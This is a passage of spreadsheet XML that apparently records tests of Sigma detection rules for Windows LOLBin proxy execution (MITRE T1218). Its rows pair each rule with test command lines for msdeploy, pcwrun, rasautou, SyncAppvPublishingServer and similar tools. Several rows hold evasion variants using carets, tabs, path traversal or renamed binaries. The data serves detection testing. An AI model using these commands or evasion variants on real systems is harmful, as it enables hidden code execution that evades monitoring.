        <v>0</v>
      </c>
      <c r="H3689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3689" s="44" t="n"/>
      <c r="J3689" s="44" t="n"/>
      <c r="K3689" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3690" ht="15.75" customHeight="1" s="42">
      <c r="A3690" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3690" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdeploy</t>
        </is>
      </c>
      <c r="C3690" s="44" t="inlineStr">
        <is>
          <t>Execute Files with Msdeploy.exe</t>
        </is>
      </c>
      <c r="D3690" s="44" t="inlineStr">
        <is>
          <t>646bc99f-6682-4b47-a73a-17b1b64c9d34</t>
        </is>
      </c>
      <c r="E3690" s="44" t="inlineStr">
        <is>
          <t>msdeploy.exe /verb:sync /source:RunCommand /dest:runCommand -dest:runCommand'="calc.exe"</t>
        </is>
      </c>
      <c r="F3690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3690" s="44" t="n"/>
      <c r="J3690" s="44" t="n"/>
      <c r="K3690" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3691" ht="15.75" customHeight="1" s="42">
      <c r="A3691" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3691" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdeploy</t>
        </is>
      </c>
      <c r="C3691" s="44" t="inlineStr">
        <is>
          <t>Execute Files with Msdeploy.exe</t>
        </is>
      </c>
      <c r="D3691" s="44" t="inlineStr">
        <is>
          <t>646bc99f-6682-4b47-a73a-17b1b64c9d34</t>
        </is>
      </c>
      <c r="E3691" s="44" t="inlineStr">
        <is>
          <t>msdeploy.exe "verb:sync" "-source:RunCommand" "-dest:runCommand"'="calc.exe"</t>
        </is>
      </c>
      <c r="F3691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3691" s="44" t="n"/>
      <c r="J3691" s="44" t="n"/>
      <c r="K3691" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3692" ht="15.75" customHeight="1" s="42">
      <c r="A3692" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3692" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdeploy</t>
        </is>
      </c>
      <c r="C3692" s="44" t="inlineStr">
        <is>
          <t>Execute Files with Msdeploy.exe</t>
        </is>
      </c>
      <c r="D3692" s="44" t="inlineStr">
        <is>
          <t>646bc99f-6682-4b47-a73a-17b1b64c9d34</t>
        </is>
      </c>
      <c r="E3692" s="44" t="inlineStr">
        <is>
          <t>msdeploy.exe verb:"sync" -source:"RunCommand" -dest:"runCommand"'="calc.exe"</t>
        </is>
      </c>
      <c r="F3692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3692" s="44" t="n"/>
      <c r="J3692" s="44" t="n"/>
      <c r="K3692" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3693" ht="15.75" customHeight="1" s="42">
      <c r="A3693" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3693" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdeploy</t>
        </is>
      </c>
      <c r="C3693" s="44" t="inlineStr">
        <is>
          <t>Execute Files with Msdeploy.exe</t>
        </is>
      </c>
      <c r="D3693" s="44" t="inlineStr">
        <is>
          <t>646bc99f-6682-4b47-a73a-17b1b64c9d34</t>
        </is>
      </c>
      <c r="E3693" s="44" t="inlineStr">
        <is>
          <t>msdeploy.exe -dest:runCommand'="calc.exe" -source:RunCommand verb:sync</t>
        </is>
      </c>
      <c r="F3693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3693" s="44" t="n"/>
      <c r="J3693" s="44" t="n"/>
      <c r="K3693" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3694" ht="15.75" customHeight="1" s="42">
      <c r="A3694" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3694" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C3694" s="44" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D3694" s="44" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E3694" s="44" t="inlineStr">
        <is>
          <t>OpenWith.exe "/c" C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3694" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3694" s="44" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary (cec8e918-30f7-4e2d-9bfa-a59cc97ae60f)</t>
        </is>
      </c>
      <c r="J3694" s="44" t="n"/>
      <c r="K3694" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3695" ht="15.75" customHeight="1" s="42">
      <c r="A3695" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3695" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C3695" s="44" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D3695" s="44" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E3695" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c OpenWith.exe /^c C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3695" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3695" s="44" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary (cec8e918-30f7-4e2d-9bfa-a59cc97ae60f)</t>
        </is>
      </c>
      <c r="J3695" s="44" t="n"/>
      <c r="K3695" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3696" ht="15.75" customHeight="1" s="42">
      <c r="A3696" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3696" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C3696" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D3696" s="44" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E3696" s="44" t="inlineStr">
        <is>
          <t>pcwrun.exe ..\..\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3696" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3696" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3696" s="44" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J3696" s="44" t="n"/>
      <c r="K3696" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3697" ht="15.75" customHeight="1" s="42">
      <c r="A3697" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3697" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C3697" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D3697" s="44" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E3697" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c pcwrun.exe ..^/^./Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3697" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3697" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina (6004abd0-afa4-4557-ba90-49d172e0a299)</t>
        </is>
      </c>
      <c r="J3697" s="44" t="n"/>
      <c r="K3697" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3698" ht="15.75" customHeight="1" s="42">
      <c r="A3698" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3698" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C3698" s="44" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D3698" s="44" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E3698" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rasautou.exe -^d C:\Windows\Temp\test.dll -^p DllMain</t>
        </is>
      </c>
      <c r="F3698" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3698" s="44" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe (cd3d1298-eb3b-476c-ac67-12847de55813)</t>
        </is>
      </c>
      <c r="J3698" s="44" t="n"/>
      <c r="K3698" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3699" ht="15.75" customHeight="1" s="42">
      <c r="A3699" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3699" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C3699" s="44" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D3699" s="44" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E3699" s="44" t="inlineStr">
        <is>
          <t>rasautou.exe\t-d\tC:\Windows\Temp\test.dll\t-p\tDllMain</t>
        </is>
      </c>
      <c r="F3699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3699" s="44" t="n"/>
      <c r="J3699" s="44" t="n"/>
      <c r="K3699" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3700" ht="15.75" customHeight="1" s="42">
      <c r="A3700" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3700" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C3700" s="44" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D3700" s="44" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E3700" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rasautou.exe C:\Windows\Temp\update.exe &amp;&amp; C:\Windows\Temp\update.exe -d C:\Windows\Temp\test.dll -p DllMain</t>
        </is>
      </c>
      <c r="F3700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3700" s="44" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe (cd3d1298-eb3b-476c-ac67-12847de55813); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3700" s="44" t="n"/>
      <c r="K3700" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3701" ht="15.75" customHeight="1" s="42">
      <c r="A3701" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3701" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C3701" s="44" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D3701" s="44" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E3701" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cscript.exe //B C:\Windows\System32\register_app.vbs -reg^ister COMPlusApp Name C:\path\to\provider.dll</t>
        </is>
      </c>
      <c r="F3701" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3701" s="44" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution (1c8774a0-44d4-4db0-91f8-e792359c70bd); Potential Register_App.Vbs LOLScript Abuse (28c8f68b-098d-45af-8d43-8089f3e35403)</t>
        </is>
      </c>
      <c r="J3701" s="44" t="n"/>
      <c r="K3701" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3702" ht="15.75" customHeight="1" s="42">
      <c r="A3702" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3702" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C3702" s="44" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D3702" s="44" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E3702" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //B C:/Windows/System32/register_app.vbs -register COMPlusApp Name C:\path\to\provider.dll</t>
        </is>
      </c>
      <c r="F3702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3702" s="44" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse (28c8f68b-098d-45af-8d43-8089f3e35403)</t>
        </is>
      </c>
      <c r="J3702" s="44" t="n"/>
      <c r="K3702" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3703" ht="15.75" customHeight="1" s="42">
      <c r="A3703" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3703" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C3703" s="44" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D3703" s="44" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E3703" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //B C:\Windows\System32\.\register_app.vbs -register COMPlusApp Name C:\path\to\provider.dll</t>
        </is>
      </c>
      <c r="F3703" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3703" s="44" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution (1c8774a0-44d4-4db0-91f8-e792359c70bd); REGISTER_APP.VBS Proxy Execution (1c8774a0-44d4-4db0-91f8-e792359c70bd); Potential Register_App.Vbs LOLScript Abuse (28c8f68b-098d-45af-8d43-8089f3e35403)</t>
        </is>
      </c>
      <c r="J3703" s="44" t="n"/>
      <c r="K3703" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3704" ht="15.75" customHeight="1" s="42">
      <c r="A3704" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3704" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C3704" s="44" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D3704" s="44" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E3704" s="44" t="inlineStr">
        <is>
          <t>ScriptRunner.exe "-appvscript" C:\Windows\Temp\test.cmd</t>
        </is>
      </c>
      <c r="F3704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3704" s="44" t="n"/>
      <c r="J3704" s="44" t="n"/>
      <c r="K3704" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3705" ht="15.75" customHeight="1" s="42">
      <c r="A3705" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3705" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C3705" s="44" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D3705" s="44" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E3705" s="44" t="inlineStr">
        <is>
          <t>ScriptRunner.exe\t-appvscript\tC:\Windows\Temp\test.cmd</t>
        </is>
      </c>
      <c r="F3705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3705" s="44" t="n"/>
      <c r="J3705" s="44" t="n"/>
      <c r="K3705" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3706" ht="15.75" customHeight="1" s="42">
      <c r="A3706" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3706" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C3706" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D3706" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E3706" s="44" t="inlineStr">
        <is>
          <t>sftp.exe "-D" ..\..\..\Windows\System32\calc.exe user@host</t>
        </is>
      </c>
      <c r="F3706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3706" s="44" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage (737e618a-a410-49b5-bec3-9e55ff7fbc15); Suspicious Calculator Usage (737e618a-a410-49b5-bec3-9e55ff7fbc15); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J3706" s="44" t="n"/>
      <c r="K3706" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3707" ht="15.75" customHeight="1" s="42">
      <c r="A3707" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3707" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C3707" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D3707" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E3707" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sftp.exe -^D ..\..\..\Windows\System32\calc.exe user@host</t>
        </is>
      </c>
      <c r="F3707" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3707" s="44" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage (737e618a-a410-49b5-bec3-9e55ff7fbc15); Suspicious Calculator Usage (737e618a-a410-49b5-bec3-9e55ff7fbc15); Use Of The SFTP.EXE Binary As A LOLBIN (a85ffc3a-e8fd-4040-93bf-78aff284d801); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J3707" s="44" t="n"/>
      <c r="K3707" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3708" ht="15.75" customHeight="1" s="42">
      <c r="A3708" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3708" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_execute_psh</t>
        </is>
      </c>
      <c r="C3708" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3708" s="44" t="inlineStr">
        <is>
          <t>fbd7c32d-db2a-4418-b92c-566eb8911133</t>
        </is>
      </c>
      <c r="E3708" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer.exe "n;\tStart-Process\tcalc.exe"</t>
        </is>
      </c>
      <c r="F3708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3708" s="44" t="n"/>
      <c r="J3708" s="44" t="n"/>
      <c r="K3708" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3709" ht="15.75" customHeight="1" s="42">
      <c r="A3709" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3709" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_execute_psh</t>
        </is>
      </c>
      <c r="C3709" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3709" s="44" t="inlineStr">
        <is>
          <t>fbd7c32d-db2a-4418-b92c-566eb8911133</t>
        </is>
      </c>
      <c r="E3709" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer.exe "n;`nStart-Process calc.exe"</t>
        </is>
      </c>
      <c r="F3709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3709" s="44" t="n"/>
      <c r="J3709" s="44" t="n"/>
      <c r="K3709" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3710" ht="15.75" customHeight="1" s="42">
      <c r="A3710" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3710" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_execute_psh</t>
        </is>
      </c>
      <c r="C3710" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3710" s="44" t="inlineStr">
        <is>
          <t>fbd7c32d-db2a-4418-b92c-566eb8911133</t>
        </is>
      </c>
      <c r="E3710" s="44" t="inlineStr">
        <is>
          <t>cmd /c SyncAppvPublishingServer.exe "n;^ Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F3710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3710" s="44" t="n"/>
      <c r="J3710" s="44" t="n"/>
      <c r="K3710" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3711" ht="15.75" customHeight="1" s="42">
      <c r="A3711" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3711" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C3711" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3711" s="44" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E3711" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\\windows\\system32\\SyncAppvPublishingServer.vbs "; Start-Process calc"</t>
        </is>
      </c>
      <c r="F3711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3711" s="44" t="n"/>
      <c r="J3711" s="44" t="n"/>
      <c r="K3711" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3712" ht="15.75" customHeight="1" s="42">
      <c r="A3712" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3712" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C3712" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3712" s="44" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E3712" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\\windows\\system32\\SyncAppvPublishingServer.vbs" ; Start-Process calc</t>
        </is>
      </c>
      <c r="F3712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3712" s="44" t="n"/>
      <c r="J3712" s="44" t="n"/>
      <c r="K3712" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3713" ht="15.75" customHeight="1" s="42">
      <c r="A3713" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3713" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C3713" s="44" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D3713" s="44" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E3713" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\\windows\\system32\\SyncAppvPublishingServer.vbs `; Start-Process calc</t>
        </is>
      </c>
      <c r="F3713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3713" s="44" t="n"/>
      <c r="J3713" s="44" t="n"/>
      <c r="K3713" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3714" ht="15.75" customHeight="1" s="42">
      <c r="A3714" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3714" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_unregmp2</t>
        </is>
      </c>
      <c r="C3714" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy</t>
        </is>
      </c>
      <c r="D3714" s="44" t="inlineStr">
        <is>
          <t>727454c0-d851-48b0-8b89-385611ab0704</t>
        </is>
      </c>
      <c r="E3714" s="44" t="inlineStr">
        <is>
          <t>unregmp2.exe -HideWMP</t>
        </is>
      </c>
      <c r="F3714" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3714" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J3714" s="44" t="n"/>
      <c r="K3714" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3715" ht="15.75" customHeight="1" s="42">
